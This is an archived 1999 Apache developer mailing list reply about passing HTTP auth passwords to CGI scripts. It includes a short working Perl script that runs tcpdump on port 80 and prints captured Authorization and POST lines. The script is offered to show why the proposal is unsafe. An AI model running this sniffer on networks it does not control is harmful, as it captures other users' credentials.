httpd-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Bill Jones" <b...@fccj.org>
Subject Re: Passing passwords to CGI
Date Wed, 04 Aug 1999 13:25:19 GMT
 Graham wrote:

> Dirk-Willem van Gulik wrote:
> 
>> > Is there a "correct" way of doing this?
>>
>> No, of course not :-) but the solution is
>>
>> Adding to your cflags
>>
>>         CFLAGS += -DSECURITY_HOLE_PASS_AUTHORIZATION
>>
>> Do a grep in the source (util_script.c) for the full story.
>
> Here's a thought - how about including the capability for passwords to
> be inserted into the POST data that a CGI reads via stdin, ie the
> password could be read as if it was simply another option on a form.
>
> The name of this POST variable would be configurable so it didn't clash
> with any existing variables in CGI.
>
> Is this a good idea? If so, I'll try get it to work.
>
> Regards,
> Graham


Here is why you don't want to do that:

#!/usr/bin/perl

$LIMIT = shift || 5000000;

$|=1;
open (STDIN,"/usr/sbin/tcpdump -lnx -s 1024 dst port 80|");
while (<>) {
    if (/^\S/) {
        last unless $LIMIT--;
        while ($packet=~/(GET|POST|WWW-Authenticate|Authorization).+/g)  {
            print "$client -> $host\t$&\n";
        }
        undef $client; undef $host; undef $packet;
        ($client,$host) = /(\d+\.\d+\.\d+\.\d+).+ > (\d+\.\d+\.\d+\.\d+)/
            if /P \d+:\d+\((\d+)\)/ && $1 > 0;
    }
    next unless $client && $host;
    s/\s+//;
    s/([0-9a-f]{2})\s?/chr(hex($1))/eg;
    tr/\x1F-\x7E\r\n//cd;
    $packet .= $_;
}


/^HTH$/i;
-Sneex-  :]
______________________________________________________________________
Bill Jones  Data Security Specialist  http://www.fccj.org/cgi/mail?dss
  http://certserver.pgp.com:11371/pks/lookup?op=get&search=0x37EFC00F
  http://www.networksolutions.com/cgi-bin/whois/whois?BJ1936

         Jacksonville Perl Mongers
         http://jacksonville.pm.org
         jax@jacksonville.pm.org

Mime
View raw message